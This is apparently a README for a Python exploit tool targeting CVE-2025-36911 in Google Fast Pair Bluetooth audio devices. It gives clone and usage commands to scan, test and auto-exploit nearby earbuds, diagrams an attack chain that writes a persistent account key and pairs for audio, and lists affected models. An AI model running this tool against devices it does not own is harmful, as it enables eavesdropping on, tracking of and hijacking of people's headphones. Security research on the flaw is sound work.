Share
## https://sploitus.com/exploit?id=8EC35C55-BE08-5600-94BE-CAB99DE25ED0
# WhisperPair Python CLI
**Fast Pair CVE-2025-36911 Exploit Tool in Python**
> **Author:** SΓ©bastien Dudek ([@FlUxIuS](https://twitter.com/FlUxIuS)) @ [Penthertz](https://penthertz.com)
> **Credits:** whisperpair.com for the discovery and this nice APK that shorten the time of the implementation [wpair-app](https://github.com/zalexdev/wpair-app)
---
## β οΈ Disclaimer
**For authorized security research only.** Test only on devices you own.
---
## π The Vulnerability
**CVE-2025-36911** affects Google Fast Pair implementations on millions of Bluetooth audio devices.
**Normal behavior:** Devices should only accept pairing requests when in *pairing mode* (button held, case opened, etc.)
**Vulnerable behavior:** Devices accept Key-Based Pairing (KBP) requests *anytime*, even when idle or already paired.
### Impact
- π Unauthorized pairing to victim's earbuds/headphones
- π€ Potential audio injection/eavesdropping
- π Device tracking via account keys
---
## β‘ Quick Start
```bash
# Install
pip install bleak cryptography
git clone https://github.com/Penthertz/CVE-2025-36911-exploit.git
cd CVE-2025-36911-exploit
# Scan for targets
python3 whisperpair-cli.py scan
# Test if vulnerable
python3 whisperpair-cli.py test AA:BB:CC:DD:EE:FF
# Exploit
python3 whisperpair-cli.py exploit --quick
```
---
## π― Exploit Strategy
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ATTACKER VULNERABLE DEVICE β
β β
β 1. BLE Scan ββββββββββββββββββββββΊ Fast Pair Advertisement β
β (Find target) (Model ID visible) β
β β
β 2. Connect βββββββββββββββββββββββΊ GATT Connection β
β β
β 3. KBP Request βββββββββββββββββββΊ Key-Based Pairing Char β
β (Should be rejected β NOT REJECTED! β
β when not in pairing mode) (CVE-2025-36911) β
β β
β 4. Parse Response βββββββββββββββ BR/EDR Address β
β β
β 5. Write Account Key βββββββββββββΊ Account Key Char β
β (Persistent access) β ACCEPTED β
β β
β 6. Classic BT Pair βββββββββββββββΊ Audio Profiles (A2DP) β
β (Game over) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
The tool tries multiple strategies automatically:
1. **ENCRYPTED_ECDH** - Spec-compliant 80-byte encrypted request
2. **RAW_WITH_PUBKEY** - Raw block + public key (some devices)
3. **RAW_KBP** - Plain 16-byte request (broken implementations)
---
## π Commands
| Command | Description |
|---------|-------------|
| `scan` | Live-updating BLE scan for Fast Pair devices |
| `scan -a` | Scan all BLE devices |
| `info ` | Show GATT services/characteristics |
| `test ` | Non-invasive vulnerability check |
| `exploit ` | Full exploit chain |
| `exploit -q` | Auto-scan + exploit first target |
---
## π§ Affected Devices
Tested vulnerable (check firmware updates):
| Brand | Models |
|-------|--------|
| **Google** | Pixel Buds, Pixel Buds Pro 2 |
| **Sony** | WF-1000XM4, WH-1000XM5/XM6, LinkBuds S |
| **JBL** | Tune Buds, Live Pro 2, Tune 760NC |
| **Anker** | Soundcore Liberty 4/4 NC |
| **Nothing** | Ear (a) |
| **Bose** | QuietComfort Earbuds II |
| **Jabra** | Elite 8 Active |
| + many more | |
See more on [whisperpair.com](whisperpair.com)